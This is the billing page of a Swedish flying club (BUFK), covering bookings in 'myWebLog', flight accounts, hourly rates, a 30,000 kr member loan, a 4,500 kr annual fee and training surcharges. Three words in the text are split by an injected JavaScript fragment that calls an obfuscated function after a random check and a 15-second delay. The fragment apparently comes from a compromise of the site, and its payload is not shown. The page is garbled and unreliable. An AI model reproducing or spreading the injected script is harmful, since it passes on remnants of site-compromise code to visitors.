Debiteringssystem

Flyg­pla­nen bokas via ett web­ba­se­rat kalen­der­sy­stem, “myWebLog”. Det är även i detta system som flyg­ti­den bok­förs för debitering.

För att få till­gång till syste­met, måste man antingen vara full­be­talandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande med­lem i BUFK eller ha ett gäst­med­lem­skap, samt ha till­de­lats ett flyg­konto. Sal­dot på flyg­kon­tot han­te­ras indi­vi­du­ellt av med­lem­men, men det ska all­tid fin­nas pengar på kon­tot före flyg­ning. Det kan vara enklast att betala in ett större belopp i för­skott för att ha till­godo för kommandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande flyg­ningar.

Tim­pri­set för klub­bens flyg­plan inne­fat­tar även bränsle, dvs du beta­lar inte extra för att tanka. Du kan erhålla en rabatt på 500 kro­nor på tim­pri­set genom antingen betala en årlig abon­ne­mangs­av­gift eller ett med­lemslån, dvs där du lånar ut pengar till klub­ben som en engångsin­be­tal­ning. Då får du även rabatt på den fasta årliga fly­gav­gif­ten (se nedan).

Med­lemslån - 30.000 kr
Lånet beta­las in till klub­ben och löper med en upp­säg­nings­tid av 6 måna­der. Det inne­bär en rejäl sänk­ning i flyg­kost­nad per år - prata med kas­sö­ren om detta!

Abon­ne­mangs­av­gift — 4.500 kr/år
För att täcka flyg­pla­nens fasta kost­na­der tas en årlig fly­gav­gift ut för flygandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande med­lem­mar. Med­lem­mar med lån får en rabatt på 3.000 kr och beta­lar såle­des endast 1.500 kr. Fly­gav­gif­ten beta­las vid säsong­ens början.

Övriga tillägg/avdrag

  • Ben­sin­skat­te­re­duk­tion för skol­ning, kom­mer­si­ell flyg­ning, etc. (allt utom pri­vat flyg­ning) avgår med 60 kr/tim
  • För skol­ning till­kom­mer 150 kr/tim samt lärarar­vode 300 kr per lektion.